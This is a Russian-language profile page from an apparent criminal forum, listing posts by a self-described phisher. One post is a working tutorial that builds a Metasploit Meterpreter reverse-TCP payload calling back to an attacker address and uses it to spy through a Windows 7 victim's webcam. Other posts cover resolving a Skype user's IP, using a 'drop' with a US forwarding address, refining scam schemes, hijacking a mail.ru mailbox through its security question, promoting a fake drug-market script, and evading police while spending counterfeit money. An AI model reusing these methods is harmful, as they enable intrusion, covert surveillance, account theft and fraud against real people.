Перейти к публикации
автогарант Депозитарий

Шагоход

Members
  • Публикации

    211
  • Зарегистрирован

  • Посещение

  • Дней в лидерах

    2
  • Time Online

    17м 40с
My Favorite Songs

Последний раз Шагоход выиграл 15 июня 2022

Публикации Шагоход были самыми популярными!

6 подписчиков

Дополнительная информация

  • Регион
    Пхукет
  • Квалификация
    Фишер

Торговая информация

  • Сделок: 7 Сделок: 7
  • Депозит: 0 Депозит: 0

Посетители профиля

19817 просмотров профиля
  1. Роясь на просторах инета совершенно случайно наткнулся на конторку usmedexport.com , которая предоставляет абсолютно бесплатно адрес в сша. После регистрации в данной системе Вы получите личный американский почтовый адрес (место на складе USMedExport в штате ILLINOIS). Указывая его во время покупок как SHIPPING ADDRESS - адрес доставки покупок в США, (используя ваши банковские карты Visa, Master Card или PayPal) сможете самостоятельно, без посредников заказать / купить в США: модную, недорогую одежду и обувь, популярную электронику, фирменные авто-мото запчасти, профессиональные инструменты и любые товары из магазинов США, включая Amazon и аукцион eBay, а USMedExport перешлет Вам ваши покупки. Регистрируйтесь, подтверждайте свой email, и сразу начинайте покупать в США самостоятельно и без посредников! Работают с огромным количеством шопов в том числе с ебей и амазон. Полный список можно посмотреть на сайте этого посредника. Так же там подробно расписаны все подробности их работы. И условия использования. Все что вам нужно будет внести данные дропа из ру или снг при регисрации и можно идти закупаться. на полноценную статью не катит но думаю пригодится. так же там есть платные услуги кому интересно можно ознакомится там же на сайте.
  2. В последнее время одним из самых эффективных способов распространения вредоносного ПО является социальная инженерия. Как показывает практика, дыры в ПО рано или поздно закрываются, а в мозгу пользователей все обстоит не так радужно… К примеру, не так давно Microsoft выпустила патч наглухо отключающие авторан с флэш-накопителей. Да и многие антивирусные продукты взяли на вооружение запрет файла autorun.inf. Казалось бы это должно подкосить волну малвари, использующей для распространения съемные диски. Ан нет! Почему..? Врожденное любопытство толкает людей на многие необдуманные поступки. Раз нельзя автоматически запустить, надо заставить пользователя сделать это! Я попытался сгруппировать самые распространенные методы социальной инженерии, которые используют злоумышленники для распространения вредоносного ПО и дать некоторые советы по защите. 1. Подмена иконки файла Исполняемый файл маскируется под папку, легитимное приложение, либо тип файла с помощью соответствующей иконки. Вечно спешащий пользователь тычет мышкой и запускает файл на исполнение. Защита: Приучите себя использовать файловые менеджеры типа Total Commander и т.п. Если вы все-таки используете проводник Windows, старайтесь работать с табличным отображением файлов и обращать внимание на типа файла, прежде чем щелкать по нему мышью (особенно при работе с файлами со съемных и сетевых дисков). 2. Интригующее название файла Интригующее название исполняемого файла, подбивающее пользователя запустить его (например, «Не открывать.scr»). Защита: У грамотного пользователя подобные названия сразу должны вызывать подозрения. Проверьте тип файла в файловом менеджере, если это *.exe, *.scr, *.bat, *.vbs, то лучше не надо его трогать. Если это исполняемый файл, а руки так и чешутся запустить, хотя бы проверьте его на virustotal, правда первые несколько дней свежая малварь практически не детектится антвирусами. 3. Игра на стремлении пользователя получить доступ к вожделенному контенту Пользователь завлекается на сайт злоумышленника, под предлогом доступа к контенту (видео, например) ему предлагается скачать кодек\драйвер\распаковщик. Любопытство в очередной раз берет верх над разумом… Защита: Никогда не переходите по таким ссылкам и тем более не запускайте если все-таки скачали. Да, установка специального кодека для просмотра видео, например, необходима на некоторых легальных сайтах встраивающих рекламу в ролик. Оно вам надо? Лучше найти тоже самое в другом месте. Используйте антифишинговые фильтры встроенные в современные браузеры и антивирусы, не игнорируйте их предупреждения. 4. Имитация живого общения То, что на электронную почту и в различные мессенджеры сыпятся сообщения с мольбами отправить SMS или ткнуть в ссылку уже никого не удивляет, к счастью большинство пользователей научились не обращать на это внимание. Поэтому злодеи осваивают новые способы. В январе этого года пользователи ICQ подверглись атаке малвари «Piggy.zip» или "H1N1", которая заражая компьютер пользователя, рассылалась всем его контактам, мало того, в ответ на фразы вроде «что за вирус на...???» и «ты бот?», вполне впопад отвечала «нет, это флешка про свинью, глянь » или «сам ты бот =». Как показал анализ кода, вирус просто ищет в сообщении ключевые слова (спамер, вирус, бот и т.п.) и выкидывает фразу как-то коррелирующую со смыслом ключевого слова. При всей простоте реализации «интеллекта» такой подход оказался чрезвычайно эффективным! Очень многие пользователи, считавшие себя относительно продвинутыми в области компьютерной безопасности попались на крючок. Страшно подумать, что будет если встроить нормальный чат-бот в подобного трояна… Справедливости ради стоит отметить, что первый подобный случай был аж в 2005. Защита: Не принимайте файлы и не переходите по ссылкам, полученным от незнакомых контактов. При приеме файлов, даже от лучших друзей, обращайте внимание на подозрительную смену стиля и манеры общения, лучше еще несколько раз попросить описать содержимое файла. 5. «Дорожное яблоко» Благодаря тотальному удешевлению различных носителей информации, в частности флэш, злоумышленник может не пожалеть подбросить диск или флэшку с трояном прямо вам на порог. Жгучее желание посмотреть что же там такое, скорее всего, возьмет верх, пользователь подключит диск и активирует малварь (вполне возможно одним из вышеперечисленных способов), чего и добивался злоумышленник! Защита: Проверять на отдельной изолированной машине все поступающие в компанию из непроверенных источников носители информации. Если вы работаете в серьезной компании и «вдруг» что-то нашли по дороге на работу следует воздержаться от самостоятельных экспериментов и передать носитель в службу IT-безопасности для проверки. С другой стороны, если вы обычный студент или водопроводчик, вряд ли кто-то будет специально разбрасывать перед вами флэшки. Тем не менее, лучше проверять находки на содержимое в виртуальной машине. 6. Эксплуатация страхов пользователя Как правило, человека пытаются убедить в том, что его компьютер кишит вирусами, личные данные и пароли утекают хакерам, с его IP якобы рассылается спам и т.д. Для решения всех проблем предлагается незамедлительно скачать и установить некий «антивирус» (будьте внимательны, многие из этих «решений» полностью копируют интерфейс широко известных продуктов). После установки происходит либо блокировка системы, с требованием оплатить «лицензию продукта», либо просто на компьютер пользователя пачками скачивается другая малварь, с каким угодно функционалом. Защита Никогда не реагируйте на предупреждения, всплывающие на разных сомнительных сайтах о том, что ваш компьютер заражен, вам угрожает опасность и т.п. Пользуйтесь только известными марками антивирусов, всегда скачивайте дистрибутивы исключительно с официального сайта компании.
  3. Шагоход

    Схемы Мошенничества в одноклассниках

    Хочу немного улучшить первый вариант и согласиться с Кладовщиком. Так как зачем создавать для каждого отдельную страничку, если с одной можно разводить намного больше людей? Лучше одну, но постоянную.
  4. Шагоход

    Залив грязи на ФИЗ, ЮР, ОФФШОРЫ от Инфектеда

    @VASEK53 А после того как поскидываешь пруфы хер знает кому не будешь переживать за то что можешь поехать баланду жрать?))Вроде не тупой а на таких элементарных вещах готов сам же попалиться.
  5. Шагоход

    Кардерские и Хакерские форумы

    @88lucifer98 Проверь
  6. Всем привет! Давайте сегодня поговорим об одном из возможных взломов Windows 7, плюс ко всему будем подглядывать через web-камеру. Web-камера давным давно стала неотъемлемой частью аппаратного обеспечения компьютера и не важно ноутбук это или стационар. К тому же большой процент пользователей до сих пор используют Windows XP и Windows 7, на которые уязвимостей выше крыши. Ко всему этому можно добавить неумение пользователями настраивать свою ОС, что уже играет немаловажную роль! Итак, давайте воспользуемся одной из давно найденных, но до сих пор работающих уязвимостей для Windows 7, которая затрагивает UAC (User Account Control). Он ней вы можете прочитать: Windows zero-day flaw bypasses UAC! New Windows Vulnerability Bypasses UAC Bypassing UAC with User Privilege under Windows Vista/7 Уязвимость User Account Control (UAC) в Windows 7 Для начала нам нужно, создать вредоносный исполняемый файл run_me.exe, который в BackTrack создается так, как показано ниже: # msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.5 LPORT=4444 X > /root/Desktop/run_me.exe LHOST=192.168.1.5 – IP-адрес атакующего LPORT=4444 – порт атакующего Запускаем Metasploit: # msfconsole Далее вводим команды: > use exploit/multi/handler > set payload windows/meterpreter/reverse_tcp > set lhost 192.168.1.5 > exploit Теперь нам нужно, что пользователь запустил файл run_me.exe. Как это добиться уже другая история, как вариант можно засунуть вредоносный файл в другой файл. Например, как скрыть/склеить exe-файл в jpg можете прочитать тут. Это не единственный вариант, поэтому вооружайтесь googl’ом. После того, когда жертва запустит файл, мы получим контроль над системой с привилегиями SYSTEM. Теперь можно делать все, что угодно! Но сейчас будем подсматривать за пользователем. Сначала посмотрим, есть ли вообще у него web-камера? meterpreter > webcam_list 1: Logitech Webcam 120 Да нам повезло! Имеется одна web-камера: Logitech Webcam 120. Теперь сделаем снимок: meterpreter > webcam_snap Так же можно попробовать запустить web-камеру в режиме реального времени. Делается это следующей командой: meterpreter > run webcam -p /var/www После чего откроется браузер и вы будете видеть то, что видит камера. Если браузер не откроется, значит откройте его сами и в адресной строке введите: /var/www/webcam.html На этом все! Как видите ничего сложного нет. Если возникнут вопросы, обращайтесь.
  7. На этой неделе были приданы огласке несколько «сливов», связанных с почтовыми системами: отmail.ru, от yandex, информация о взломе почты Сатоси Накомото. В связи с этими событиями вспомнилась история, рассказанная «одним моим знакомым» про то, как невозможное стало возможным благодаря социальной инженерии и доступу к ящику на mail.ru. Итак, однажды ему прислали ссылку на сайт, посвященный статьям об обмане электросчетчиков с просьбой узнать, а можно ли на этом сайте «купить без денег» информацию? Данный сайт был полностью статическим и хостился, если мне не изменяет память, на одном из условно-бесплатных хостингов, кажется это был h1.ru. На сайте на тот момент было 15 разнообразных методов остановки или отмотки бытовых электросчетчиков. Каждый метод, судя по описанию, представлял из себя подробную пошаговую инструкцию. В кратком описании метода находилось несколько принципиальных схем «для затравки», полную инструкцию можно было приобрести отправив заявку на email в домене mail.ru. В ответ на заявку сбрасывались реквизиты для оплаты, после оплаты на email в ручном режиме высылался заказанный файл с инструкциями. Единственной зацепкой для поиска следов файлов с полными инструкциями стал email. От которого мой знакомый, естественно «Забыли пароль?». Форма восстановления пароля предложила вспомнить «Любимое блюдо?», машинально, не особо надеясь на успех в голове промелькнул набор «пиво/водка/борщ/макароны». Можете представить его удивление, когда первое же слово из набора предложило ввести новый пароль для почтового ящика. Однако, предвкушению легкой возможности, скачать все методы разом в виде вложений из папки отправленных сообщений, не суждено было сбыться. Вэб интерфейсом, судя по всему, ни разу не пользовались, во входящих были только письма-запросы на приобретение того или иного метода и несколько сканов платежек, подтверждающих оплату. Отправка файлов происходила из почтовой программы, не сохраняя отправленные сообщения на сервере или вообще с другого почтового ящика. Утешительным призом стало единственное письмо с файлом-вложением от покупателя, который не смог открыть присланный ему файл. Бочкой дегтя в этой ложке меда на тот момент стала пропажа доступа к почтовому ящику — владелец восстановил пароль и сменил ответ на секретный вопрос. В соответствии с принципом «Хорошая мысля приходит опосля» в голове уже имелся план по получению всех предлагаемых методов (думаю, уже понятный читателю этих строк), но не было доступа к почтовому ящику продавца… На следующий день, пробуя очередной набор ответов из серии «фуа-гра/хатиноко/балют», mail.ru настойчиво предложил указать дополнительную информацию о почтовом ящике, чтобы получить к нему доступ. Приняв предложение, через форму обратной связи была выслана слезная история, о своем любимом блюде «пиво» и о зловредных троянах, которые непонятно каким способом увели драгоценный ящик, как раз в момент прочтения последнего письма, которое пришло От: «xxx» В:«yyy» С Темой:«zzz»… и это СРАБОТАЛО! В течении часа на указанный контактный email пришла ссылка на восстановление пароля. Однако на этот раз перед сбросом пароля был выполнен ряд приготовлений, а именно: подготовлен список рассылки на всех отправителей сообщений из папки входящие. Текст рассылки был самый что ни на есть безобидный, ведь оказалось, что именно сегодня ресурс по отмотке счетчиков праздновал свой 3х летний юбилей и в качестве подарка своим постоянным заказчикам предлагал на выбор любой из имеющихся методов в подарок. Для подтверждения статуса «постоянного заказчика» нужно было всего-лишь в письме-запросе подарка вложить файл с приобретенным ранее методом. Рассылка прошла, в течении 3х часов на руках были все имеющиеся у ресурса файлы-методы, а 15 участников даже получили подарок, в соответствии со своим письмом-запросом. После чего доступ к ящику был безвозвратно утерян и по сей день принадлежит истинному владельцу, который, не меняя схемы, все также продает «схемы и способы обмана счетчиков». P.S. Естественно все описанные в хабе события и персонажи вымышленные, а любые совпадения случайны. UPD: «Купить без денег» методы просили люди, которые эти счетчки проектировали, для понимания насколько их вариант защищен.
  8. Заходим на сайт http://zadarma.com Регистрируемся при регистрации выбираем тариф бесплатный Подтверждаем почту и все готово. Сразу после регистрации Вы получаете 30 бесплатных минут для звонков в любую из 35 стран мира. Далее Вы можете использовать до 400 бесплатных минут в течение двух месяцев.​ P.S. Должен быть установлен флэш плеер, плюс через оперу не получалось дать разрешение на микрофон, а через хром все нормально заработало.
  9. Первый способ. Есть спец.сайты которые по логину скайпа определяют ip. Вам нужно только вписать скайп жерты и нажать resolve Первый сайт.(самый лучший): anonware.net/resolver/skype.php Второй сайт: skypelookup.pw/index.php Третий сайт: res0lve.com P.S Лучше вычислять когда жертва в сети, а то у плохом случае выдаст вам левый айпи. Второй способ. Этот способ 100% вычисляет ip. Для начала нам нужно вызвать диспетчер задач. Вызвать его можно через комбинацию CTRL+ALT+DELETE или CTRL+Caps Lock+Esc. Далле нажимаем на вкладку Производительность и ниже кликаем "Открыть мониторинг ресурсов" И там мы кликаем на вкладку сеть. Далее передаем любой файл нашей жертве и заходим во вкладку Сетевая активность. Там у вас в столбце "Образ" будет написано skype.exe и в столбце адрес будет написан айпи нашей жертвы.
  10. Шагоход

    Обнал, как это работает ?

    Риск зависит от того на сколько далеко ты готов шагать в этом направлении.
  11. Шагоход

    Купить Фейк Гидры зеркало HYDRA

    @Дмитрий Задерей Пушка,которая стреляет ебическими ядрами.Монеты капают постоянно,по херне но много.На первых парах снял более 100к деревянных.Бери не пожалеешь!
  12. Шагоход

    Купить Фейк Гидры зеркало HYDRA

    Очень интересный скрипт,не встречал ничего подобного.Тема по нарко всегда будет в топе и чем строже закон тем прибыльнее дело.С удовольствием стану первым покупателем,естественно покупать буду через гарант.@BOTNET Жду в ЛС,хочу задать вопросов перед покупкой.
  13. Такое ощущение что люди не фальшь пришли покупать, а технику в интернет магазине) 1) Созванивайся с продавцами всегда с новой симкарты, при этом из консперативного места (лучше работать вдвоем или втроем) 2) Не перемещайся на машине, даже если ты ее оставишь в соседнем квартале тебя по камерам срисуют в 2 счета. Перемещайся на мотике в шлеме. 3) Не сбывай товар в регионе где закупаешься 4) не работай долго в одном регионе В День реально закупаться на 500.000Р (это ноутбуки, фототехника, самый основной товар)
  14. нужен взлом вотс апп

     

    1. Bork

      Bork

      Да нужно взломать Ватсапп

       

  15. Здравствуйте. Нужен взлом ватсап. Можете мне помочь ?!

    1. Sar

      Sar

      Это вообще реально ?

  • 39389961.gif

Пользователь регулярно проводит сделки через гарант сервис и имеет положительную торговую статистику на площадке. Скорее всего ему можно доверять и работать напрямую. С правилами работы через гарант вы можете ознакомится тут.
Пользователь не провел ни одной сделки через гарант. О правилах работы через гарант вы можете ознакомиться тут.
Пользователь внес страховой депозит на форуме. Является проверенным селлеров и гарантированно проводит все сделки через гарант сервис Даркнета. Подробнее о системе депозитов вы можете прочитать тут.
Пользователь не имеет обеспечительного депозита на форуме, при работе с ним не отправляйте предоплату и всегда привлекайте гаранта к сделкам. Подробнее о системе депозитов вы можете прочитать тут.
Статус пользователя "НЕ ПРОВЕРЕН" гласит о том, что он не прошел верификацию своего аккаунта в Даркнете. Верификацию можно пройти предоставив положительные отзывы и рекомендации о себе. Подробнее о том, как пройти верификацию Вы можете прочитать тут.
Статус пользователя "ПРОВЕРЕННЫЙ" говорит о том, что селлер прошел проверку своих товаров или услуг у Администрации Даркнета. Подробнее о том, как пройти проверку вы можете прочитать тут.
×